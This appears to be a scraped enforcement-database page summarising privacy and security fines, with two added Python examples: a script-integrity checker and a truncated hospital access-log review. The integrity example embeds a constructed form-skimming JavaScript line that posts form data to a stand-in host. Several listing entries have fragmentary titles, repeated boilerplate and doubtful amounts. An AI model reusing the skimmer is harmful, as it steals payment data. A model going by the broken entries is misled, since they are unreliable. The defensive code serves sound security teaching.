Global Enforcement Explorer
Track landmark enforcement decisions across privacy, competition, and AI governance from 2017 to present.
Inquiry concerning the University of Limerick
[technology] This Decision arises from an own-volition inquiry into the University of Limerick (‘UL’) following a series of personal data breaches that occurred between November 2018 and January 2020. The temporal scope of the Inquiry is from May 2018 to January 2020.
€45,000
Inquiry concerning the Department of Social Protection
[technology] This own-volition inquiry, which commenced in July 2021, follows a prior DPC investigation into certain aspects of the DSP’s processing of personal data in connection with the issuance of PSCs. That investigation resulted in legal proceedings, in which the DSP appealed an Enforcement Notice issued by the DPC, which were subsequently withdrawn. A joint agreement between the DPC and the DSP as well as the final investigation report from that inquiry were published in December 2021. The final invest
€550,000
Inquiries into Meta Platforms Ireland Limited (Token Breach)
[technology] The breach arose from MPIL’s use of user tokens in connection with certain features on the Facebook platform. User tokens are coded identifiers that can be used to verify the user of a platform or utility, and to control access to particular platform features and personal data of the user and their contacts. In 2017 MPIL introduced a new video uploading feature. When used in conjunction with Facebook’s ‘View As’ feature (which allows a user’s page to be viewed as another user would see it) and t
€8M
Sligo County Council
[technology] For more information, you can download the full decision at this link: Inquiry into Sligo County Council November 2024 - (PDF, 7.6MB)
€29,500
Maynooth University
[technology] This decision arises from an own-volition inquiry that the DPC commenced in July 2019. The inquiry related to a personal data breach notified by Maynooth University in November 2018.
€25,000
Inquiry concerning Mediahuis Ireland Group Limited
[technology] The DPC has completed a complaint-based inquiry into MIG’s processing of personal data in relation to a series of news reports in the print and online editions of the Irish Independent, Herald and Sunday Independent newspapers. The purpose of the inquiry was to examine if any obligations on the controller arising under Articles 5(1)(a), 5(1)(c), 5(2), 6 and 9 GDPR had been engaged and, if engaged, whether MIG infringed those obligations in publishing the personal data relating to the Complainant
EUR N/A
Apple Distribution International Limited
[technology] In light of the infringements of Articles 13(1)(c) and 13(1)(d) of the GDPR, the DPC issued a reprimand to Apple pursuant to Article 58(2)(b) of the GDPR, and the DPC ordered Apple, pursuant to Article 58(2)(d) of the GDPR to review and revise its document entitled “Apple ID Deletion Terms and Conditions” to address the transparency deficiencies identified in the DPC’s decision. In addition, with regard to Apple’s project, the DPC ordered Apple to provide details of completion of this project to
EUR N/A
Microsoft Ireland Operations Limited
[technology] The DPC finds that Microsoft infringed Article 12(4) of the GDPR in respect of the March erasure request when it failed to inform the complainant of the possibility of seeking a judicial remedy when it responded to them outlining the reasons for not taking action, in part, on the complainant’s erasure request.
EUR N/A
Airbnb Ireland UC
[technology] The DPC found that Airbnb did not validly rely on Article 6(1)(f) of the GDPR as the legal basis for processing the Complainant’s photographic ID and supplemental photographs; that Airbnb’s requirement that the Complainant verify his identity by submitting a complete and unredacted copy of his photographic ID constituted an infringement of the principle of data minimisation, pursuant to Article 5(1)(c); that by retaining, after the identity verification process was successfully completed and unt
EUR N/A
TikTok Technology Limited
[technology] The Data Protection Commission (DPC) adopted its final decision regarding its inquiry into TikTok Technology Limited (TTL) on 1 September 2023.
€345M
Respondent (PS/00598/2025)
[technology] AEPD resolution PS/00598/2025 against Respondent (PS/00598/2025)
EUR N/A
Respondent (PS/00643/2025)
[technology] AEPD resolution PS/00643/2025 against Respondent (PS/00643/2025)
EUR N/A
Respondent (PS/00354/2024)
[technology] AEPD resolution PS/00354/2024 against Respondent (PS/00354/2024)
EUR N/A
Respondent (PS/00278/2025)
[technology] AEPD resolution PS/00278/2025 against Respondent (PS/00278/2025)
EUR N/A
Respondent (PS/00352/2024)
[technology] AEPD resolution PS/00352/2024 against Respondent (PS/00352/2024)
EUR N/A
Respondent (PS/00613/2025)
[technology] AEPD resolution PS/00613/2025 against Respondent (PS/00613/2025)
EUR N/A
Respondent (PS/00259/2025)
[technology] AEPD resolution PS/00259/2025 against Respondent (PS/00259/2025)
EUR N/A
status of its company follows from the applied legal provisions (WZEVI-G)
[technology] [Editor's note: Names and companies, legal forms and product designations, addresses (incl. URLs, IP and e-mail addresses), file numbers (and the like), statistical data etc., as well as their initials and abbreviations, may be abbreviated and/or altered for pseudonymisation reasons. Obvious spelling, grammar and punctuation errors have been corrected.]
EUR N/A
status of its company
[technology] DSB decision against status of its company
EUR N/A
Unknown
[technology] DSB decision against Unknown
EUR N/A
the Tiroler Landtag (first respondent), the President of the Tiroler Landtag
[technology] [Note: Names, initials, addresses (incl. URLs), dates, verbatim quotations, text fragments, images, etc. may be abbreviated and/or altered for pseudonymisation reasons. Obvious spelling, punctuation and formatting errors have been corrected.]
EUR N/A
the Tiroler Landtag (first respondent), the Pr
[technology] DSB decision against the Tiroler Landtag (first respondent), the Pr
EUR N/A
the President of the Nationalrat (respondent) for alleged violation
[technology] [Note: Names, initials, addresses (incl. URLs), dates, verbatim quotations, text fragments, images, etc. may be abbreviated and/or altered for pseudonymisation reasons. Obvious spelling, punctuation and formatting errors have been corrected.]
EUR N/A
acronyms or abbreviations, the reasons for the
[technology] AT today's meeting, attended by Prof. Pasquale Stanzione, President, Prof. Ginevra Cerrina Feroni, Vice President, Dr. Agostino Ghiglia, member, and Dr. Luigi Montuori, Secretary General;
€20M
this measure, an appeal may be lodged before the
[technology] AT today's meeting, attended by Prof. Pasquale Stanzione, President, Prof. Ginevra Cerrina Feroni, Vice President, Dr. Agostino Ghiglia, member, and Dr. Luigi Montuori, Secretary General;
€20M
to a request d
[technology] AT today's meeting, attended by Prof. Pasquale Stanzione, President, Prof. Ginevra Cerrina Feroni, Vice President, Dr. Agostino Ghiglia, member, and Dr. Luigi Montuori, Secretary General;
€20M
the counter where customers pay for the goods
[technology] AT today's meeting, attended by Prof. Pasquale Stanzione, President, Prof. Ginevra Cerrina Feroni, Vice President, Dr. Agostino Ghiglia, member, and Dr. Luigi Montuori, Secretary General;
€2,000
Poste Italiane S.p.a. and PostePay S.p.a. concerning the
[technology] AT today's meeting, attended by Prof. Pasquale Stanzione, President, Prof. Ginevra Cerrina Feroni, Vice President, and Dr. Agostino Ghiglia, members, and Dr. Luigi Montuori, Secretary General;
€6.6M
to the
[technology] AT today's meeting, attended by Prof. Pasquale Stanzione, President, Prof. Ginevra Cerrina Feroni, Vice President, Dr. Agostino Ghiglia, member, and Dr. Luigi Montuori, Secretary General;
€2,500
this procedure, therefore, through the trade union representatives or the
[technology] AT today's meeting, attended by Prof. Pasquale Stanzione, President, Prof. Ginevra Cerrina Feroni, Vice President, Dr. Agostino Ghiglia, member, and Dr. Luigi Montuori, Secretary General;
€2,000
Framos Italia s.r.l. (in liquidation)
[technology] AT today's meeting, attended by Prof. Pasquale Stanzione, President, Prof. Ginevra Cerrina Feroni, Vice President, Dr. Agostino Ghiglia, member, and Dr. Luigi Montuori, Secretary General;
€5,000
to which it provides vocational training services, and that therefore the nature of the
[technology] AT today's meeting, attended by Prof. Pasquale Stanzione, President, Prof. Ginevra Cerrina Feroni, Vice President, and Dr. Agostino Ghiglia, member, and Dr. Luigi Montuori, Secretary General;
€85,000
Clearview AI Inc.
[technology] Clearview AI built a facial recognition database of over 30 billion photographs scraped from the internet — including images of Dutch residents — without any lawful basis, consent, or transparency, violating GDPR Arts. 5, 6, 9, and 14. The AP also issued a personal liability warning to Clearview's directors, noting the company had ignored prior enforcement actions by EU counterparts in France, Italy, Greece, and the UK. Clearview was additionally ordered to cease all processing of Dutch residents' data and to delete existing records.
€30.5M
Uber Technologies Inc.
[technology] Uber transferred personal data of European drivers — including location data, photos, payment details, and taxi licence information — to the US without adequate GDPR Chapter V transfer safeguards after the Privacy Shield invalidation. The Dutch AP, acting as lead supervisory authority following complaints filed by the French drivers' rights association LLLM, found that Uber's Standard Contractual Clauses were not correctly implemented in practice and that no supplementary measures addressed US government surveillance risks. This remains the largest ever GDPR fine for unlawful international data transfers.
€290M
Advanced Computer Software Group Limited
[cybersecurity] Advanced Computer Software Group, supplier of NHS 111 and other critical healthcare IT services, was fined for an August 2022 ransomware attack that disrupted NHS services and compromised personal data of 82,946 patients. The ICO found Advanced had failed to implement multi-factor authentication across its systems, had inadequate vulnerability scanning, and had not conducted a DPIA for the health systems it managed — forcing NHS 111 to revert to paper records and disrupting ambulance dispatch across England. The fine was reduced from an initial notice of £6.09 million following representations.
€3.6M
Cerebral Inc.
[technology] Cerebral, a mental health telehealth company, was fined $7 million for sharing sensitive mental health information of approximately 3.2 million users — including conditions such as depression, anxiety, ADHD, and suicidality disclosed in intake questionnaires — with Meta, Google, TikTok, and other advertising platforms through tracking pixels and social media login features, violating its explicit privacy promises. The FTC also found Cerebral's subscription cancellation process was designed to make it deliberately difficult for patients to discontinue care, constituting an unfair practice. Cerebral was prohibited from using or disclosing health data for advertising.
€6.4M
Advocate Aurora Health
[technology] Advocate Aurora Health agreed to pay $12.9 million to HHS OCR — the largest HIPAA settlement of 2024 — for unauthorised disclosure of the protected health information of approximately 3 million patients through tracking pixels (Meta Pixel and Google Analytics) embedded on its patient-facing websites and patient portal. The tracking technologies transmitted patient identities, appointment details, IP addresses, and proxy health information to Meta and Google without patient authorisation, constituting impermissible disclosures of PHI to advertising platforms that were not business associates under HIPAA.
€11.9M
LinkedIn Ireland Unlimited Company
[technology] The DPC fined LinkedIn €310 million for unlawfully processing the personal data of LinkedIn members for behavioural analysis and targeted advertising. The investigation found LinkedIn relied on consent, legitimate interests, and contract performance as legal bases without meeting the conditions of any of these.
€310M
London Borough of Hackney
[cybersecurity] The London Borough of Hackney was fined for an October 2020 ransomware attack that compromised personal data of a large number of council residents and staff, including housing benefit records, social care information, and sensitive data such as racial and ethnic origin. The ICO found Hackney had failed to patch known software vulnerabilities, had inadequate security monitoring, and had insufficient network segmentation — all of which contributed to the successful attack. The council took over two years to fully restore its systems, significantly disrupting public services.
€114,660
TikTok Technology Limited
[technology] The DPC fined TikTok €345 million for failing to protect children's privacy. Findings included: accounts of users aged 13-17 were set to public by default, the Family Pairing feature allowed adults to link to children's accounts without verifying their age, and the 'public' setting defaulted to allowing other users to include children's videos in duet/stitch features.
€345M
Netflix International B.V.
[technology] Netflix failed to adequately inform subscribers about how their personal data was processed between 2018 and 2020, violating GDPR Arts. 13 and 14 transparency obligations. Netflix's privacy statements did not clearly explain which data was collected, for what purpose, how long it was retained, or with which third parties it was shared. The AP led the investigation as Netflix's EU headquarters are in Amsterdam, with the inquiry initiated following coordinated NOYB complaints filed across multiple EU jurisdictions.
€4.8M
Enel Energia S.p.A.
[technology] The Garante issued a €79 million injunction against Enel Energia for unlawful telemarketing practices. The investigation found systematic use of call centres that contacted individuals listed on the national opt-out register (Registro Pubblico delle Opposizioni) and without valid consent.
€79M
Amazon.com Inc. (Alexa)
[technology] Amazon was fined $25 million for COPPA violations related to Alexa, specifically for retaining children's voice recordings, transcripts, and geolocation data indefinitely in violation of its own privacy promises and COPPA's data minimisation requirements. The FTC found Amazon retained children's voice data for years even after parents requested deletion, gave employees broad access to children's voice recordings, and used children's geolocation data for product improvement without parental consent. Internal Amazon managers had raised concerns about the retention practices that were overruled by business considerations.
€23M
Amazon.com Inc. (Ring)
[cybersecurity] Ring, Amazon's home security camera subsidiary, agreed to pay $5.8 million after the FTC found it allowed employees and contractors unrestricted access to customers' private video footage — including intimate indoor cameras — and failed to implement security controls that enabled credential-stuffing attacks against thousands of customer accounts. The FTC characterised Ring's internal culture as 'anything goes' with respect to employee access to sensitive footage, including a Ukraine-based contractor allowed to view thousands of recordings without any purpose limitation or security review.
€5.3M
Meta Platforms Ireland Limited
[technology] The DPC issued a €1.2 billion fine against Meta Ireland — the largest GDPR fine to date — for transferring personal data of EU/EEA Facebook users to the United States without adequate safeguards following the invalidation of Privacy Shield by the Court of Justice in the Schrems II ruling.
€1.2B
OpenAI (ChatGPT)
[technology] Following a temporary ban on ChatGPT in Italy in March 2023, the Garante reached agreement with OpenAI on remediation measures. OpenAI later received a €20 million fine for multiple GDPR violations including processing data without a valid legal basis, lack of age verification mechanisms for minors, and insufficient transparency.
€20M
TikTok Information Technologies UK Limited
[technology] TikTok was fined for processing the personal data of an estimated 1.4 million children under 13 in the UK without appropriate parental consent between May 2018 and July 2020, and for allowing under-13s to create accounts on the platform despite claiming to prevent this. The ICO found TikTok also failed to use children's data in accordance with its own privacy policy and failed to ensure data accuracy. The investigation drew on the ICO's Age Appropriate Design Code (Children's Code), which came into force in September 2021 and sets out standards platforms must meet when processing children's data.
€14.9M
BetterHelp Inc.
[technology] BetterHelp, an online mental health counselling platform, was fined $7.8 million for sharing customers' sensitive mental health information — including intake questionnaire responses about depression, anxiety, and therapy history — with Facebook, Snapchat, Criteo, and Pinterest for targeted advertising, directly contradicting explicit privacy promises that mental health data would never be used for advertising. The FTC found BetterHelp uploaded therapy users' email addresses and Facebook IDs to create Custom Audiences and Lookalike Audiences for new customer acquisition. The $7.8M settlement was used to provide refunds to affected consumers.
€7.2M
GoodRx Holdings Inc.
[technology] GoodRx was subject to the FTC's first-ever enforcement action under the Health Breach Notification Rule for sharing customers' sensitive personal health information — including prescription drug purchases and associated medical conditions — with Facebook, Google, Criteo, and other advertising platforms for targeted advertising, without users' knowledge or consent. The FTC found GoodRx failed to honour its privacy policy commitment not to share health information with advertisers and violated its promise to limit data use to healthcare purposes. GoodRx also failed to notify affected users of the disclosures as required.
€1.4M
TikTok
[technology] CNIL fined TikTok €5 million for failing to provide a simple mechanism for refusing non-essential cookies on its platform for French users, and for failing to explain the purpose of cookies clearly.
€5M
Epic Games Inc.
[technology] Epic Games was fined $275 million for COPPA violations in Fortnite — including collecting personal information from children under 13 without verifiable parental consent, enabling live voice communications between children and adults by default, and creating accounts for children without parental authorisation. A simultaneous $245 million dark patterns settlement (total $520M) addressed charges that Epic used manipulative button configurations and accidental charge mechanisms to cause players to make unintended in-game purchases. The combined $520 million settlement was the largest FTC enforcement action in gaming history.
€253M
CaixaBank S.A.
[technology] The AEPD fined CaixaBank €6 million for processing the biometric data of employees using a fingerprint access control system without adequate legal basis. The fine was later reduced to €3 million following voluntary payment and acknowledgement of responsibility.
€6M
Interserve Group Limited
[cybersecurity] Interserve Group, a major UK government contractor, was fined for a 2020 phishing attack that compromised personal and special category data of up to 113,000 current and former employees, including health, financial, and immigration status information. The ICO found Interserve had failed to implement adequate anti-phishing controls, failed to follow its own security processes for flagging suspicious emails, had outdated and unpatched software across its systems, and provided insufficient staff security training. The company was also required to implement a formal remediation programme.
€5.1M
Meta Platforms Ireland Limited
[technology] The GBA Litigation Chamber issued an enforcement decision against Meta Platforms Ireland for GDPR violations in Belgium relating to Meta's use of 'contractual necessity' as a legal basis for behavioural advertising, finding this basis incompatible with GDPR for processing personal data for ad targeting beyond what is strictly necessary to provide the contracted social media service. The Belgian action was part of a coordinated EU-wide enforcement process that ultimately resulted in the Irish DPC issuing fines of €210M (Instagram) and €180M (Facebook) in January 2023 following an EDPB binding decision. Belgium acted as a concerned supervisory authority triggering the dispute resolution mechanism.
€100,000
Clearview AI
technologyCNIL fined Clearview AI €20 million for unlawfully collecting and processing biometric data of French residents without a legal basis, and for failing to respond to data subject access requests within the required timeframe.
€20M
Easylife Group Limited
technologyEasylife Group unlawfully profiled over 145,000 customers using purchase history to infer health conditions and then sold them related health products without their knowledge or consent — for example, inferring diabetes from purchases of compression socks and targeting those customers with diabetes medication products. The ICO found this constituted processing of inferred special category health data without explicit consent, as required by UK GDPR Art. 9. Easylife was simultaneously fined £130,000 by the ICO under PECR for related unlawful direct marketing calls.
€1.6M
Xfera Móviles S.A. (Yoigo)
technologyThe AEPD fined Yoigo/Xfera Móviles €900,000 for making unsolicited commercial communications to customers who had not given consent, violating LOPDGDD provisions on the use of contact data for direct marketing purposes.
€900,000.0
Instagram (Meta Platforms Ireland Limited)
technologyThe DPC fined Instagram €405 million for mishandling the personal data of children and teenagers. The investigation found that children's accounts were set to public by default, and that contact details of minors were publicly accessible.
€405M
Meta Platforms Ireland Limited (Facebook)
technologyThe Garante fined Facebook/Meta €60 million for unlawfully sharing Italian users' data with third parties through the 'Like' button integration on external websites without adequate notice or consent, and for cross-referencing data between Facebook and off-Facebook activity.
€60M
Twitter Inc.
technologyTwitter was fined $150 million for violating a 2011 FTC consent order by using phone numbers and email addresses that users had provided for two-factor authentication security purposes to deliver targeted advertising through its Tailored Audiences programme between 2014 and 2019. The FTC found Twitter had explicitly told users the data was collected solely for account security while simultaneously monetising it for advertising targeting. The settlement also required a comprehensive privacy and information security programme with independent biennial audits.
€138M
Clearview AI Inc.
technologyThe ICO fined Clearview AI for unlawfully scraping and processing facial images of UK residents to build a database of over 20 billion images used to offer facial recognition services to law enforcement and commercial clients, without lawful basis, transparency, or any mechanism for UK residents to exercise data subject rights. The ICO coordinated its investigation with Australian and other privacy regulators as part of a joint international enforcement effort. The fine was reduced from an initial enforcement notice of £17.1 million following representations.
€8.8M
Doctissimo
technologyCNIL fined health website Doctissimo €380,000 for multiple GDPR violations: collecting health data without valid consent, keeping data longer than necessary, and using outdated encryption protocols on its web server.
€380,000.0
An Austrian bank
technologyThe DSB fined an Austrian bank €1.2 million for retaining former customer data beyond the required retention period, and for failing to implement adequate access controls that led to an internal data breach where employee data was accessible to unauthorised staff.
€1.2M
Clearview AI Inc.
technologyThe Garante ordered Clearview AI to delete the biometric data of Italian residents and imposed a €20 million fine for unlawfully building a facial recognition database from web-scraped images, without legal basis, without transparency, and without respecting data subject rights.
€20M
IAB Europe
technologyThe Belgian DPA (GBA) found that IAB Europe's Transparency and Consent Framework (TCF) — the industry consent mechanism used by virtually every publisher and ad tech company across the EU — violated GDPR in multiple fundamental ways, including that the encoded TC String constitutes personal data, that IAB Europe is a data controller for its creation, and that 'legitimate interest' cannot serve as legal basis for behavioural advertising profiling at scale. The decision had immediate EU-wide consequences as thousands of websites relied on TCF as their primary GDPR consent mechanism. IAB Europe was given six months to bring the TCF into compliance.
€250,000.0
Webpage operator (Google Analytics user)
technologyThe DSB issued a landmark ruling that an Austrian website operator violated GDPR by using Google Analytics, which transferred European users' data to the United States without adequate safeguards following the Schrems II ruling. This was one of the first EU regulatory decisions against Google Analytics use post-Schrems II.
EUR N/A
Google LLC
technologyCNIL fined Google €150 million for making it more difficult for users to refuse cookies than to accept them. The cookie consent mechanism on google.fr and youtube.com did not provide a simple means to refuse all cookies, violating French data protection law.
€150M
Facebook (Meta Platforms)
technologyCNIL fined Meta/Facebook €60 million for the same defective cookie consent mechanism. Users on facebook.com could not refuse cookies as easily as they could accept them, breaching Article 82 of the French Data Protection Act.
€60M
Austrian Post AG (Österreichische Post AG)
technologyThe DSB confirmed an earlier fine of €18 million against Österreichische Post for processing the personal data of approximately 3 million Austrians to infer political party affinity and sell this data to third parties for advertising purposes, without a valid legal basis. The Austrian Supreme Court (OGH) subsequently reduced the fine to €9.5 million on appeal.
€9.5M
Endesa Energía S.A.U.
technologyThe AEPD fined Endesa €3 million for processing customers' personal data without a valid legal basis for direct marketing, and for failing to adequately handle data subjects' objections to marketing communications.
€3M
WhatsApp Ireland Limited
technologyThe DPC fined WhatsApp €225 million for failing to comply with GDPR transparency requirements. WhatsApp did not adequately inform users and non-users about how their data is shared with other Meta companies.
€225M
CRIF GmbH
technologyThe DSB fined CRIF GmbH €2 million for operating a credit scoring and personal data brokerage business without adequate transparency, without proper legal basis for special category data inferences, and for failing to facilitate access and erasure requests from data subjects.
€2M
BBVA (Banco Bilbao Vizcaya Argentaria)
technologyThe AEPD fined BBVA €5 million for tracking customers' location data and processing personal data for profiling purposes without adequate transparency and without providing clear consent mechanisms in the BBVA mobile banking application.
€5M
Municipality of Hallein
technologyThe DSB imposed an €800 fine on the Municipality of Hallein for operating a video surveillance system in a public area without proper signage informing individuals about the processing of their image data, violating GDPR transparency requirements under Article 13.
€800.0
ABN AMRO Bank N.V.
financeABN AMRO Bank N.V. reached a €480 million settlement with the Dutch Public Prosecution Service for sustained AML failures including inadequate customer due diligence, insufficient transaction monitoring, and failure to file suspicious transaction reports in a timely manner. Prosecutors established that ABN AMRO had been aware of the compliance deficiencies for years and had failed to implement adequate remediation, with shortcomings identified across the bank's operations between 2014 and 2020. The bank admitted to serious structural failures in its AML programme.
€480M
Vodafone España S.A.U.
technologyThe AEPD fined Vodafone España €8.15 million for multiple GDPR violations including unlawful processing of personal data for commercial communications without consent, obstructing customer requests to exercise data protection rights, and inadequate data security measures.
€8.2M
AOK Baden-Württemberg
technologyThe Baden-Württemberg State DPA (LfDI BW) fined statutory health insurer AOK Baden-Württemberg €1.24 million for unlawfully passing the personal data of 500,000 policyholders — including names, addresses, and insurance numbers — to partner lottery operators for direct marketing without member consent. Members were not informed their data would be shared with third-party lottery companies, and the LfDI found no adequate legal basis for the transfer under GDPR Art. 6. AOK had organised branded prize draws with lottery partners and provided member data to enable the lottery operators' own follow-on marketing campaigns.
€1.2M
Marriott International Inc.
cybersecurityMarriott International was fined for a data breach originating from a compromise of the Starwood Hotels reservation system that dated to 2014, remained undetected until 2018, and ultimately exposed approximately 339 million guest records worldwide including around 7 million UK residents. The ICO found Marriott failed to conduct adequate due diligence when it acquired Starwood in 2016 and failed to implement adequate security measures on the inherited systems post-acquisition. The fine was reduced from an initial notice of £99.2 million following co-operation with the investigation.
€21.5M
British Airways plc
[cybersecurity] British Airways was fined £20 million over a 2018 attack in which the attacker entered through a compromised third-party account and poorly segmented internal systems, and then modified JavaScript on the BA website so that personal and payment card data entered during the booking process was silently copied to an attacker-controlled domain; approximately 429,612 customers and staff were affected. The ICO found BA's security measures inadequate and concluded that the attack could have been prevented or detected far earlier with controls that would not have involved excessive cost or difficulty, such as limiting access to applications and data, rigorous testing, and multi-factor authentication for remote access. The fine was reduced from an initial notice of intent of £183.39 million, in part because of the economic impact of COVID-19 on the aviation sector.
€23.4M
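The attack above worked because a script served from the site's own servers was altered and nothing noticed. The following is an added example, not code from British Airways or from the ICO decision, of the two complementary checks a practitioner would put in place: pinning a script tag to its content hash with Subresource Integrity, so the browser refuses a modified file, and a server-side drift check that compares the scripts actually deployed against the hashes recorded at release time. The script paths, their contents and the appended skimmer are constructed; `example.invalid` is a reserved, non-routable name.

```python
"""Script-integrity checks of the kind a Magecart-style page modification would
have to defeat.  Added example, not code from British Airways or the ICO; the
script names and contents below are constructed."""
import base64
import hashlib
import hmac


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return a Subresource Integrity string ("sha384-<base64 digest>") for content."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """Emit a <script> tag pinned to the content hash: the browser refuses to run
    the file if it no longer matches, whether it was changed on the server or in transit."""
    return f'<script src="{src}" integrity="{sri_hash(content)}" crossorigin="anonymous"></script>'


def check_scripts(baseline: dict[str, str], current: dict[str, bytes]) -> dict[str, str]:
    """Server-side drift check: compare deployed scripts with release-time hashes.
    Statuses: ok, modified, unexpected (not in the manifest), missing."""
    report = {}
    for src, content in current.items():
        if src not in baseline:
            report[src] = "unexpected"
        elif hmac.compare_digest(baseline[src], sri_hash(content)):
            report[src] = "ok"
        else:
            report[src] = "modified"
    for src in baseline.keys() - current.keys():
        report[src] = "missing"
    return report


# Constructed release-time scripts (standing in for a site's own JS bundle).
RELEASE_SCRIPTS = {
    "/js/booking.js": b"function submitBooking(f){ return post('/api/book', f); }\n",
    "/js/vendor/modernizr.js": b"/* feature detection library */\n",
}
BASELINE = {src: sri_hash(body) for src, body in RELEASE_SCRIPTS.items()}

# Constructed post-incident snapshot: a skimmer appended to the vendor file and an
# extra file dropped beside it.  The exfiltration target is a reserved test name.
SKIMMER = (b"document.forms[0].addEventListener('submit',e=>"
           b"fetch('https://example.invalid/c',{method:'POST',body:new FormData(e.target)}));\n")
DEPLOYED_SCRIPTS = {
    "/js/booking.js": RELEASE_SCRIPTS["/js/booking.js"],
    "/js/vendor/modernizr.js": RELEASE_SCRIPTS["/js/vendor/modernizr.js"] + SKIMMER,
    "/js/vendor/helper.js": b"// not in the release manifest\n",
}


def audit() -> dict[str, str]:
    """Run the drift check over the constructed deployment."""
    return check_scripts(BASELINE, DEPLOYED_SCRIPTS)


if __name__ == "__main__":
    for src, status in sorted(audit().items()):
        print(f"{status:10s} {src}")
    print(script_tag("/js/booking.js", RELEASE_SCRIPTS["/js/booking.js"]))
```

SRI only covers resources loaded with the `integrity` attribute, and an attacker who can rewrite the HTML itself can rewrite the hash too; the release-manifest comparison is the check that does not depend on the page being trustworthy, which is why the two belong together.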
H&M Hennes & Mauritz AB
[technology] The Hamburg DPA (HmbBfDI) imposed what was then Germany's largest GDPR fine on H&M for systematically recording hundreds of employees' private life details at its Nuremberg service centre, including family matters, religious beliefs, health conditions and personal notes gathered during 'welcome back talks' after absences and in routine conversations, storing them on a networked file server accessible to up to 50 managers, and using them to make HR decisions. The collection had gone on for years and came to light only when a configuration error in October 2019 made the records accessible to all company staff for several hours. H&M acknowledged the violations and introduced remedial measures.
€35.3M
Transavia Airlines C.V.
[cybersecurity] Transavia Airlines suffered a 2019 data breach in which an attacker logged in with two IT-department accounts protected only by easily guessed passwords and no second factor, gained access to the personal data of some 83,000 passengers, and downloaded the records (names, dates of birth and flight reservation details) of about 25,000 of them. The AP found that Transavia had failed to implement multi-factor authentication, adequate password requirements and least-privilege access on systems holding passenger records, a violation of GDPR Art. 32 independent of the breach itself, and that the absence of these basic controls had directly enabled the compromise.
€400,000
notebooksbilliger.de AG
[technology] The Lower Saxony DPA (LfD Niedersachsen) fined notebooksbilliger.de AG €10.4 million for operating a pervasive video surveillance system that filmed employees at their workplaces, in warehouses and in rest and social rooms, and also captured customers in sales areas, continuously for at least two years, without an adequate legal basis, without properly informing those filmed, and far beyond any demonstrable security purpose such as investigating specific suspected offences. Footage was in many cases kept for 60 days without justification and was not systematically deleted. The LfD found violations of GDPR Arts. 5 (including data minimisation and storage limitation), 6 and 13.
€10.4M
Doorstep Dispensaree Ltd
[technology] Doorstep Dispensaree, a pharmacy supplying medication to care homes, received the ICO's first GDPR fine, £275,000, after approximately 500,000 documents (including patient names, addresses, dates of birth, NHS numbers, medical conditions and prescription details) were found in unlocked crates, disposal bags and a cardboard box in a courtyard at the rear of its premises, exposed to the weather and accessible to anyone who entered. The documents, dated between January 2016 and June 2018, were discovered during an unrelated MHRA inspection; the pharmacy had no document retention schedule or secure destruction procedure. The ICO found it had failed to implement the basic physical security measures required for health records.
€321,750
Premera Blue Cross
[cybersecurity] Premera Blue Cross agreed to pay $6.85 million to HHS OCR following a cyberattack, begun in 2014 and discovered in 2015, that exposed the protected health information of 10.4 million individuals, including clinical and financial information. HHS OCR found systemic HIPAA non-compliance, including failure to conduct an accurate and thorough risk analysis and failure to implement information system activity review. Critically, a third-party security audit had identified the vulnerabilities later exploited by the attackers several months before the breach, but remediation was not completed in time.
€6.3M
ING Belgium SA/NV
[finance] The National Bank of Belgium (NBB) imposed supervisory measures and administrative fines on ING Belgium for systemic deficiencies in its anti-money laundering programme, identified in the aftermath of parent company ING Group's €775 million Dutch AML settlement of September 2018. Investigators found inadequate customer due diligence procedures, insufficient transaction monitoring coverage, and delayed suspicious transaction reporting to the Belgian Financial Intelligence Unit (CTIF-CFI). The NBB required a comprehensive AML remediation programme overseen by an independent compliance monitor.
€3M
Haga Ziekenhuis
[cybersecurity] Haga Ziekenhuis (a teaching hospital in The Hague) received the first GDPR fine imposed by the AP for failing to implement adequate access controls and audit logging for electronic patient records, violating GDPR Art. 32 and Dutch medical confidentiality obligations. The AP's investigation, triggered by media reports that dozens of hospital staff had accessed the records of a high-profile patient without any treatment relationship, found that staff authenticated to the records system with a single factor (a badge or a password, not both) and that access logs were not routinely reviewed, so unauthorised reads went unnoticed. The hospital was ordered to remedy the shortcomings by a set deadline, on pain of periodic penalty payments.
€460,000
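The second finding above, that logs existed but nobody looked at them, is the one most organisations can fix quickly. The following is an added example, not from the Haga case or the AP decision, of the review a hospital's security team would run over its record-access audit trail: every read is checked against the patient's care team, reads with a recorded break-glass reason are set aside for human review, and patients whose record attracted several unexplained readers in a short period are surfaced, since that is the signature of staff looking up a newsworthy patient. The log lines, user identifiers, care-team table and field names are all constructed.

```python
"""Access-log review for electronic patient records.  Added example, not code
from the Haga case; the audit log, care-team table and field names are constructed."""
import csv
import io
from collections import defaultdict

# Constructed audit trail: who viewed which record, and whether an emergency
# ("break-glass") justification was recorded at the time.
AUDIT_LOG = """\
timestamp,user,role,patient,action,reason
2019-04-02T08:01:00,u101,nurse,P-1,view,
2019-04-02T08:05:00,u102,physician,P-1,view,
2019-04-02T09:10:00,u300,admin,P-1,view,
2019-04-02T09:11:00,u301,nurse,P-1,view,
2019-04-02T09:12:00,u302,nurse,P-1,view,
2019-04-02T09:30:00,u303,physician,P-1,view,break-glass: ER consult
2019-04-02T10:00:00,u101,nurse,P-2,view,
2019-04-02T10:05:00,u400,nurse,P-2,view,
"""

# Constructed care-team assignments.  In a real EHR this comes from the
# admission / treatment-relationship table; without it role-based access
# control cannot distinguish "a nurse" from "this patient's nurse".
CARE_TEAM = {"P-1": {"u101", "u102"}, "P-2": {"u101"}}


def parse_log(text: str) -> list[dict]:
    """Parse the CSV audit trail into one dict per access event."""
    return list(csv.DictReader(io.StringIO(text)))


def classify(events, care_team):
    """Split events into (authorised, break_glass, unjustified)."""
    authorised, break_glass, unjustified = [], [], []
    for ev in events:
        if ev["user"] in care_team.get(ev["patient"], set()):
            authorised.append(ev)
        elif ev["reason"].strip():
            break_glass.append(ev)   # permitted, but each one needs a human to confirm it
        else:
            unjustified.append(ev)
    return authorised, break_glass, unjustified


def lookup_clusters(unjustified, threshold: int = 3):
    """Patients whose record was opened by >= threshold distinct unauthorised users."""
    users_by_patient = defaultdict(set)
    for ev in unjustified:
        users_by_patient[ev["patient"]].add(ev["user"])
    return {p: sorted(u) for p, u in users_by_patient.items() if len(u) >= threshold}


def review() -> dict:
    """Run the full review over the constructed log and return the findings."""
    events = parse_log(AUDIT_LOG)
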